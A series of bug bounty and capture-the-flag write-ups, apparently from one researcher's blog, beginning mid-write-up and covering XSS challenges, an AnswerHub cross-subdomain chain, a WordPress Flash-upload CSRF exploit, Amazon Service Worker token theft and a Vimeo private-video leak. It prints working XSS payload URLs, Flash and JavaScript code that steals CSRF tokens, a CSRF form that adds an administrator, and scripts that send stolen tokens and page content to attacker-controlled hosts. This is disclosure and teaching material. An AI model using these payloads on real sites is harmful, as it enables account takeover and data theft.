However, it wasn’t that simple. The 404 page encoded the filename using percentage encoding and removed the % character from the response. I experimented with various inputs but couldn’t bypass this limitation.

Second Round: Server Fingerprinting

I fingerprinted the server to check if it was a server-side issue. The HTTP response header included:

Server: Google Frontend

But this wasn’t the real HTTP server. It was a Google App Engine response. Using manual techniques (since Nmap would provide the same output), I triggered a long filename error to reveal more details:

This confirmed that the server was running Apache. The goal was now to trigger an error page that reflected the request URL. Since the 404 page sanitizes inputs , I focused on the 403 page , which could be triggered by accessing restricted files such as .htaccess or server-status.

By sending double-encoded payloads , I was able to reflect the input without encoding. The final payload was:

../server-status?%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E

Bypassing CSP

The Content Security Policy (CSP) was:

content-security-policy: default-src 'self'

This meant inline scripts wouldn’t execute, and external scripts were blocked unless they were hosted on the same origin.

Final Exploit

To execute a <script> tag via innerHTML, I used an <iframe> with the srcdoc attribute. This trick allows an attacker to embed an entire HTML document inside the <iframe>, bypassing CSP limitations.

Since we controlled the custom 404 page , we injected JavaScript into it:

404 - 'File "'; // 404 - 'string' = NaN
alert(1); // XSS Triggered
'" was not found in this folder.' // Valid JavaScript

The final exploit URL was:

https://challenge.intigriti.io/#..//server-status/?%253Ciframe%2520srcdoc%253D%2527%253Cscript%2520src%253D%2522x%252527%253Balert(document.domain)%253B%252527%2522%253E%253C%252Fscript%253E%2527%253E%253C%252Fiframe%253E%250A

Conclusion

This was an incredibly fun challenge! Kudos to Intigriti for creating it. The entire process took me less than an hour to solve. I submitted my solution, and it was confirmed.

I hope you learned something new. Best of luck with future challenges!

Note: If you are here to see solutions only, jump to the bottom of the page.

Note 2: In this write-up, I will explain the intended solution only.

Introduction

Initially, the challenge consists only of client-side JavaScript code:

<!DOCTYPE html>
<html>
<head>
    <title>My Clock v 1.0</title>
    <script src="https://cure53.de/purify.js"></script>
    <script src="http://sandbox2.ahussam.me/url.php?code=var Url='//ahussam.me';"></script>
    <style>
        #myClock {
            font-size: 4em;
        }
    </style>
</head>
<body>
    <h2>Rules</h2>
    <ul>
        <li>Execute <i>alert(domain)</i> on this page.</li>
        <li>Hint: Your payload will be clicked at <b>XX:XX:01</b>.</li>
        <li>Only the latest browsers are supported.</li>
        <li>User interaction is allowed.</li>
    </ul>
    <center>
        <div id="myClock"></div>
        <div id="myComment"></div>
    </center>
    <h2>Solvers</h2>
    <ul>
        <li><a href="https://twitter.com/Abdulahhusam">YOU! Send a DM.</a></li>
    </ul>
    <script>
        var dirty = new URL(location).searchParams.get('comment');
        var cleanHTML = DOMPurify.sanitize(dirty, { FORBID_TAGS: ['a'] });
        document.getElementById('myComment').innerHTML = cleanHTML;
        var link = new URL(location).searchParams.get('link');

        if (link === "1") {
            var myURL = url || "https://ahussam.me";
            var newWindow = window.open(null, null, "toolbar=no,location=no,dialog=yes,personalbar=no,status=no,dependent=yes,menubar=no,resizable=yes,scrollbars=no");

            if (newWindow) {
                newWindow.opener = null;
                newWindow.location = myURL;
            }
        }

        function updateTime() {
            var time = new Date();
            var hours = time.getHours();
            var minutes = time.getMinutes();
            var seconds = time.getSeconds();
            var clock = document.getElementById('myClock');

            if (clock.innerHTML.indexOf(':') > -1) {
                var sec = clock.innerHTML.split(':')[2];
                if (parseInt(sec) + 3 < seconds) {
                    if (window.opener) {
                        exit();
                    } else {
                        location = location.hash.substr(1);
                    }
                }
            }

            clock.innerHTML = placeHolder(hours) + ":"  + placeHolder(minutes) + ":" + placeHolder(seconds);

            function placeHolder(input) {
                return input < 10 ? '0' + input : input;
            }
        }

        document.addEventListener("DOMContentLoaded", function() {
            window.setInterval(updateTime, 100);
        });
    </script>
</body>
</html>

I used DOMPurify to sanitize the comment before injecting the content into the DOM, making it secure—unless @SecurityMB finds a way around it! The only forbidden tag is:

FORBID_TAGS: ['a']

The code is a basic clock that checks whether the DOM (clock) has been paused. If it is paused for more than 3 seconds , it sets the location to location.hash. The main idea is to freeze the DOM while waiting for the payload to be triggered at XX:XX:01.

Technical Details

To begin, we must find a way to freeze the DOM. I expected some creative solutions, and I was right! Upon inspecting the page head, it was possible to XSSsandbox2.ahussam.me.

However, the real target was sandbox.ahussam.me , so we noted:

• We can XSSsandbox2.ahussam.me.

If you try to XSS sandbox2.ahussam.me, there is a simple WAF that can be bypassed. This wasn’t part of the original challenge, but I expected participants to bypass it!

Another interesting detail is that the url variable isn’t defined because JavaScript is case-sensitive , and Url is not the same as url. Adding this to our notes:

• url isn’t defined.

Putting Everything Together:

• We must freeze the DOM for 3 seconds.
• We have an XSS vulnerability onsandbox2.ahussam.me.
• We need to defineurl in sandbox.ahussam.me using DOM Clobbering.

Welcome to Site Isolation

Chrome uses multi-process architecture for security and stability. It ensures that different tabs and subdomains do not share the same thread. However, documents from the same site that reference each other must run on the same thread.

This means sandbox.ahussam.me and sandbox2.ahussam.me share a single thread! By blocking JavaScript execution on sandbox2.ahussam.me, we also block it onsandbox.ahussam.me.

The intended solution is as follows:

Host the following payload on your server:

var t = Date.now();
while (Date.now() - t < 4000) {
    nop();
}
function nop() {}

Steps to Exploit

1. Since there is noX-Frame-Options header, open both pages in <iframe> elements.
2. Block the JavaScript thread with a No-Operation (NOP) loop.
3. The DOM insandbox.ahussam.me will be frozen, causing the clock to lag by more than 3 seconds.
4. The script will execute, settingwindow.location to location.hash.

You can try an alternative solution using window.open , detailed here.

Solvers

• RootEval
• RenwaX23
• MichaB Bentkowski
• Guilherme Keerok
• Alex

Conclusion

This challenge demonstrated techniques to freeze the DOM , manipulate site isolation , and exploit JavaScript execution in different security contexts.

I hope you enjoyed this write-up and learned something new!

Last year, I received an invitation to a private bug bounty program on the HackerOne platform. Since I had some free time, I decided to give it a shot. This is the story of how I leveraged an out-of-scope domain to earn a $1250 bounty.

Understanding Out-of-Scope Domains

Note: In this write-up, “out-of-scope” refers to out-of-scope domains, not vulnerabilities.

Bug bounty programs define out-of-scope domains for multiple reasons, such as:

• The security team is aware of vulnerabilities in these domains and is working on fixing them before including them in scope.
• The bounty program has a limited budget and cannot cover all domains.
• The domains are intended for end-users, and any security testing could negatively impact them.

However, out-of-scope domains can still be used for escalation in in-scope attacks. Many bug bounty reports have demonstrated successful exploits by chaining vulnerabilities from out-of-scope to in-scope domains. Some programs even accept RCE reports on out-of-scope domains (e.g., Mail.ru’s bug bounty program).

Reconnaissance and Discovery

During my recon, I discovered a subdomain running AnswerHub. Coincidentally, I had previously found a stored XSS vulnerability in AnswerHub. Since I had already documented this issue in my past reports, I won’t go into full details here. You can read about similar findings in my previous write-ups:

• How I Hacked Oculus OAuth + eBay + IBM
• Leaking Amazon.com CSRF Tokens Using Service Worker API

Finding an Out-of-Scope Subdomain

After checking the bug bounty rules, I used Sublist3r to enumerate subdomains. I found:

answers.target.com

This subdomain was running AnswerHub and was vulnerable to the stored XSS I had previously discovered. However, it was not listed as an in-scope domain in the program rules.

I decided not to report it immediately but instead, continued searching for in-scope vulnerabilities that could be combined with this issue.

Exploiting Same-Origin Policy (SOP) Misconfiguration

I then shifted focus to an Angular app hosted on:

developer.market.target.com

I was testing JavaScript tricks when I discovered something interesting in the browser console:

>> document.domain
>> "target.com"

Understanding the Security Issue

The source code of developer.market.target.com included the following script:

document.domain = "target.com";

This overrides the default Same-Origin Policy (SOP), allowing subdomains undertarget.com to interact with each other.

This meant that if I could execute JavaScript onanswers.target.com, I could manipulate developer.market.target.com, which was in-scope!

Bypassing X-Frame-Options

To exploit this, I needed to embeddeveloper.market.target.com inside an <iframe>. However, it had the X-Frame-Options: DENY header, preventing framing.

After further testing, I discovered that the /support/ path did not enforce X-Frame-Options—meaning I could frame it!

The Proof of Concept (PoC)

I created a malicious XML file and uploaded it to answers.target.com.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
    <head>
        <title>PoC</title>
        <script type="text/javascript">
             document.domain = 'target.com';
             function exploit() {
             var i = document.getElementById("my_frame");
             var exp = i.contentWindow.document.getElementsByClassName('ng-binding')[3].innerText;
             alert(exp);
             }
        </script>   
    </head>
  <iframe src="https://developer.market.target.com/support/" id="my_frame" onload="exploit();"></iframe>
    </body>
</html>

Exploit Validation

After uploading the PoC file to answers.target.com, I confirmed that it executed JavaScript on developer.market.target.com—an in-scope domain.

[![wp](/images/target1.png)](/images/target1.png)

Steps to Reproduce:

1. Go to https://answers.target.com, open any question, and click “Reply.”
2. Upload poc.xml as an attachment and intercept the request.
3. Modify Content-Type from text/plain to text/xml and forward the request.
4. Visit the attachment URL. The exploit executes, displaying an alert box containing your username.

Reporting and Bounty

I submitted the PoC report to the bug bounty program. The security team responded quickly and awarded me $1250 for what was essentially an XSS attack!

[![wp](/images/target2.png)](/images/target2.png)

Remediation

The security team fixed the issue by:

• Applying a strictX-Frame-Options header across all subdomains.
• Updating their CSP (Content Security Policy).
• Patching the AnswerHub vulnerability so XML files could no longer be executed.

Conclusion

This case highlights how out-of-scope domains can still be useful in bug bounty programs. By thinking outside the box, you can:

• Chain vulnerabilities across domains.
• Bypass security policies using JavaScript tricks.
• Leverage misconfigurations for greater impact.

I hope you enjoyed this write-up and learned something valuable!

If you found this interesting, feel free to retweet and follow me on Twitter @Abdulahhusam.

In 2016, I was working on WordPress security, and today, I found an interesting finding. I am going to share it with you, so have a nice read.

Background

Before discussing the vulnerability, I want to talk about WordPress. For people who do not know WordPress, an open-source CMS based on PHP with millions of users worldwide and over 46 million downloads. For more statistics, visit this article. I started researching WordPress security, and since it is open-source, auditing code and functions would be an advantage for me. The source code is available here.

Many hackers target WordPress because vulnerabilities can affect millions of websites. Companies even offer large bounties—up to $50K for an RCE in WordPress! More details are here.

Technical Details

I started black-box testing WordPress to save time and understand its workflow. Given the vast number of files, I focused on specific functions as needed. Here are the user roles in WordPress:

• Super Admin — Full access across all network sites.
• Administrator — Full control over a single site.
• Editor — Can manage all posts.
• Author — Can publish and manage their posts.
• Contributor — Can write but not publish posts.
• Subscriber — Can manage only their profile.

I checked the Capability_vs._Role_Table and began testing low-privilege roles. Subscriber and Contributor roles were too limited, but as an Author , I could upload files—an attack vector worth exploring.

File Upload Security in WordPress

The upload functionality was interesting. I searched for the code responsible for handling uploads , which led me to these functions:

• getimagesize() (PHP built-in function)
• wp_check_filetype_and_ext() (WordPress function)
• wp_check_filetype() (WordPress function)

These functions checked file types based on MIME type and file extensions. However, getimagesize() had a critical security issue many PHP developers overlook :

getimagesize() supports SWF (Flash) files and treats them as images!

This meant I could upload an SWF file disguised as a JPG , bypassing security filters.

Exploiting the Vulnerability

I created a simple Flash file with the magic number CWS, changed its extension to.JPG, and uploaded it via:

http://127.0.0.1/wordpress/wp-admin/media-new.php

Exploiting Same-Origin Policy (SOP)

Since the uploaded Flash file was hosted on the same origin , it could read CSRF tokens and sensitive data from wp-admin pages. The attack worked by forcing the browser to interpret the file as Flash instead of an image using:

<object data="Ourfile.ext" type="application/x-shockwave-flash"></object>

Steps to Attack

1. Upload a disguised Flash file (SWF — JPG).
2. Leverage Same-Origin Policy (SOP) to access wp-admin data.
3. Extract CSRF tokens for admin actions.

Flash Payload (wp_poc.as)

package {
import flash.external.ExternalInterface;
import flash.display.Sprite;
import flash.events.Event;
import flash.net.URLLoader;
import flash.net.URLRequest;

public class wp_poc extends Sprite {
    private var myloader:URLLoader;
    public function wp_poc() {
        myloader = new URLLoader();
        configureListeners(myloader);
        var target:String = root.loaderInfo.parameters.input;
        var request:URLRequest = new URLRequest(target);
        try {
            myloader.load(request);
        } catch (error:Error) {
            steal("Error loading page!");
        }
    }
    private function configureListeners(dispatcher:IEventDispatcher):void {
        dispatcher.addEventListener(Event.COMPLETE, completeHandler);
    }
    private function completeHandler(event:Event):void {
        var myloader:URLLoader = URLLoader(event.target);
        steal(myloader.data);
    }
    private function steal(data:String):void{
        ExternalInterface.call("stealtoken", data);
    }
}
}

The compiled SWF file was renamed wp_poc.jpg and uploaded via an Author account.

Extracting the CSRF Token

<script>
function stealtoken(data) {
    var token = data.substring(data.lastIndexOf('wpnonce_create-user') + 28, data.lastIndexOf('wpnonce_create-user') + 38);
    alert('CSRF Token: ' + token);
    document.location = "http://ATTACKER-DOMAIN/wordpress_csrf.php?token=" + token;
}
</script>

<object id="exploit" width="100" height="100" allowscriptaccess="always" type="application/x-shockwave-flash" 
data="http://127.0.0.1/wordpress/wp-content/uploads/2017/10/wp_poc.jpg?input=http://127.0.0.1/wordpress/wp-admin/user-new.php">
</object>

CSRF Exploit to Add an Admin User (wordpress_csrf.php)

<form method="POST" name="csrf" action="http://127.0.0.1/wordpress/wp-admin/user-new.php">
    <input type="hidden" name="action" value="createuser" />
    <input type="hidden" name="_wpnonce_create-user" value="<?php echo $_GET['token']; ?>" />
    <input type="hidden" name="user_login" value="Pwned" />
    <input type="hidden" name="email" value="admin@attacker.com" />
    <input type="hidden" name="role" value="administrator" />
</form>
<script>document.forms["csrf"].submit();</script>

PoC Video:

Exploit Flow:

Remediation

After reporting this vulnerability via HackerOne, WordPress took over four months to patch it , as it affected all WordPress versions.

• Reward: $1337
• CVE Assigned: CVE-2017-5489

Conclusion

This write-up highlights:

• Security risks ofgetimagesize()
• How misconfigured file upload checks can lead to severe vulnerabilities
• The power of SOP in executing exploits

Thanks for reading! If you found this useful, feel free to share.

Hello all, I have some free time today, so I will tell you about my finding at Amazon that could have led to a complete account takeover.

Background

I was working on a private bug bounty program when I found something interesting. The platform used AnswerHub, a third-party service I had encountered before. Since I had already discovered vulnerabilities in AnswerHub, I knew it was worth revisiting. I started by testing its upload functionality, and within a short time, I found a stored XSS vulnerability via file upload. Although the domain was out-of-scope, I demonstrated how it could affect an in-scope domain, which earned me a $1250 bounty.

While working on this, I noticed that Amazon also used AnswerHub. Since Amazon’s crossdomain.xml was very permissive, I considered a new attack vector: if I could upload an SWF file on an Amazon subdomain, I might be able to steal data from the main Amazon website. However, Amazon did not allow Flash content to be uploaded.

This led me to an alternative method—leveraging Service Workers to steal CSRF tokens from Amazon.com.

Technical Details

Most of you are probably here for the technical part rather than the backstory, so let’s get into the exploit step-by-step.

Finding the Target

I searched for big companies using AnswerHub using this Google Dork:

inurl:/questions/ask.html inurl:https://

Amazon appeared in the results, and their permissive crossdomain.xml caught my attention.

Failed SWF Upload

My target was gamedev.amazon.com. I attempted to upload an SWF file but was unsuccessful. However, I already had stored XSS using SVG file uploads. This gave me a new idea—using a Service Worker to proxy traffic and hijack requests.

Understanding the Service Worker API

A Service Worker is a script that runs in the background, separate from a web page. It can:

• Intercept and modify network requests
• Handle caching and offline access
• Work independently of user interactions

For more details, check the MDN documentation: Service Worker API.

Exploit Development

Step 1: ActionScript for Extracting CSRF Tokens

I created an ActionScript file to request a specific Amazon page and extract the CSRF token.

import flash.external.*;
import flash.net.*;

(function () {
   var loader = new URLLoader(new URLRequest("https://www.amazon.com/Hacking-Art-Exploitation-Jon-Erickson/dp/1593271441/"));
   loader.addEventListener("complete", loaderCompleted);
   function loaderCompleted(event) {
       ExternalInterface.call("alert", event.target.data.slice(189270,189335));
   }
})();

I hosted this on my server (ahussam.me) as myexp.as and used Flex SDK to generate the SWF file.

Step 2: JavaScript Service Worker

The Service Worker proxies requests and returns the SWF file when triggered.

var url = "https://ahussam.me/myexp.swf";
onfetch = (e) => {
  e.respondWith(fetch(url));
}

This installed myexp.swf on a specific path, enabling it to steal CSRF tokens from amazon.com.

Step 3: Uploading the Exploit

To bypass file type restrictions, I:

• Renamed the JavaScript Service Worker as sw.txt
• Changed the Content-Type
• Uploaded it to Amazon’s AnswerHub

After upload, the file was renamed to 4837-sw.txt.

Step 4: Registering the Service Worker

I used an SVG file with JavaScript to register the Service Worker:

if ('serviceWorker' in navigator) {
    navigator.serviceWorker.register('4837-sw.txt').then(_=>location=1337);
}

I bypassed extension restrictions using content-type modification, and the HTTP request looked like this:

Step 5: Triggering the Exploit

Once installed, the Service Worker intercepted requests and served the SWF payload, which successfully extracted Amazon’s CSRF token.

Here’s the PoC URL:

https://gamedev.amazon.com/forums/storage/attachments/4937-svg.txt

After debugging (the Service Worker only works on HTTPS), the attack worked:

Reporting to Amazon

I reported the issue to Amazon’s security team, but they initially struggled to reproduce it due to the complexity of the exploit.

Then, they deleted my PoC and blocked me!

I created a PoC video, and after multiple follow-ups, they finally reproduced the vulnerability. However, after months of waiting, they never replied. I later discovered that the issue had been silently patched without any acknowledgment.

Conclusion

This attack could have led to:

• Full account takeover (modifying user phone numbers)
• CSRF attacks
• Leaking sensitive user data
• OAuth token hijacking
• Address disclosure

Lessons Learned:

• Service Workers can be a serious attack vector if misused.
• Permissive crossdomain.xml files can lead to data leaks.
• Bug bounty programs don’t always reward impactful reports.

Final Thoughts

I hope you found this write-up insightful. If you have any thoughts or questions, feel free to reach out!

Also, this method was used in the Cure53 XSSmas challenge, so if you’re interested, check out the solution write-up.

Thanks for reading!

Today, I’ll share one of my worst experiences with a bug bounty program, specifically with Vimeo’s security team.

What is Vimeo?

Vimeo is a video-sharing platform where users can upload, share, and view videos. It was the first major site to support high-definition video (since October 2007). Vimeo was founded in November 2004 by Jake Lodwick and Zach Klein.

Vimeo launched its bug bounty program on HackerOne two years ago. While I hadn’t been very active in bug hunting, I noticed that they paid $600 for vulnerabilities that exposed private videos or allowed CSRF attacks that made private videos public. Since they didn’t offer high bounties for XSS or minor bugs , I focused on finding a way to leak private videos , which was their highest payout category.

Finding the Vulnerability

To get started, I researched previous reports related to crossdomain.xml misconfigurations , since many old reports suggested that this file had been a problem for Vimeo in the past.

Vimeo’s rules stated that:

Reports of insecure crossdomain.xml configuration (again, unless you have a working proof of concept and not just a report from a scanner) will not be accepted.

So, I began searching for crossdomain.xml files across their various subdomains. Eventually, I found this one:

https://player.vimeo.com/crossdomain.xml

This file allowed any domain to send requests to player.vimeo.com. While this wasn’t immediately a security issue , I kept investigating to see what could be leaked , such as CSRF tokens, usernames, emails, or private video content.

Exploiting the Misconfiguration

Step 1: Identifying a Target

I uploaded a private video to Vimeo and set the privacy settings to ‘Only Me’. Then, I accessed the video at:

https://player.vimeo.com/video/182118182

I opened the video in two browsers:

• Firefox (Logged in as user36551307 with access to the private video)
• Chrome (Logged out, no access to private content)

Here’s what I saw in Firefox:

And in Chrome:

Clearly, the page content depended on the user’s authentication status. This meant I could potentially extract the page source from an authenticated user.

Step 2: Writing a Flash Exploit

I created a Flash (SWF) file that could send a request to player.vimeo.com/video/182118182 and extract the HTML source code of the private video page.

Flash Code (leak.swf)

package {
 import flash.display.Sprite;
 import flash.events.*;
 import flash.net.URLRequestMethod;
 import flash.net.URLRequest;
 import flash.net.URLLoader;

 public class XDomainXploit extends Sprite {
  public function XDomainXploit() {
   // Private video URL for an authenticated user
   var readFrom:String = "https://player.vimeo.com/video/182118182";
   var readRequest:URLRequest = new URLRequest(readFrom);
   var getLoader:URLLoader = new URLLoader();
   getLoader.addEventListener(Event.COMPLETE, eventHandler);
   try {
    getLoader.load(readRequest);
   } catch (error:Error) {
    trace("Error loading URL: " + error);
   }
  }

  private function eventHandler(event:Event):void {
   // Attacker-controlled server to receive the stolen content
   var sendTo:String = "http://xxe-me.esy.es/video.php";
   var sendRequest:URLRequest = new URLRequest(sendTo);
   sendRequest.method = URLRequestMethod.POST;
   sendRequest.data = event.target.data;
   var sendLoader:URLLoader = new URLLoader();
   try {
    sendLoader.load(sendRequest);
   } catch (error:Error) {
    trace("Error loading URL: " + error);
   }
  }
 }

Step 3: Saving the Stolen Content

On the attacker’s side, video.php would save the extracted HTML source code into a new file:

<?php
$data = file_get_contents("php://input");
$page_content = file_put_contents('private_video.html', $data, FILE_APPEND | LOCK_EX);
if($page_content === false) {
 die('Failed to save!');
}
else {
 echo "Exploit successful!";
}
?>

Proof of Concept (PoC)

I recorded a full PoC video , demonstrating how the exploit could be used to steal private Vimeo videos :

Everything worked perfectly. I wrote a detailed report with a PoC, source code, step-by-step instructions, and technical analysis , then submitted it to Vimeo.

Vimeo’s Response

I initially received an automated response saying this was not an issue and requesting a working PoC —which I had already provided. I resubmitted the PoC video.

Two days later, they closed my report as ‘Informative’ with this response:

Thanks for your report. We are aware of this. This is how we allow custom Flash players to work.

I was shocked. This was 100% a security issue , yet they dismissed it. I requested that my report be publicly disclosed.

The Aftermath

I waited for 30 days for HackerOne mediation , and they told me that Vimeo had already approved the public disclosure two days prior. However, it wasn’t published.

I waited 10 more days —still nothing. I contacted HackerOne support again , and they responded:

Vimeo ignored my follow-ups , didn’t fix the issue , and delayed public disclosure for months.

This wasn’t the first time Vimeo mishandled reports. Here’s another unresolved bug report with no bounty or respectful response : Report.

Conclusion

This case proves that not all bug bounty programs handle reports fairly. Vimeo had a serious vulnerability , but instead of fixing it, they ignored and dismissed my findings.

Let me know your thoughts in the comments or on Twitter:@Abdulahhusam.

Thanks for reading.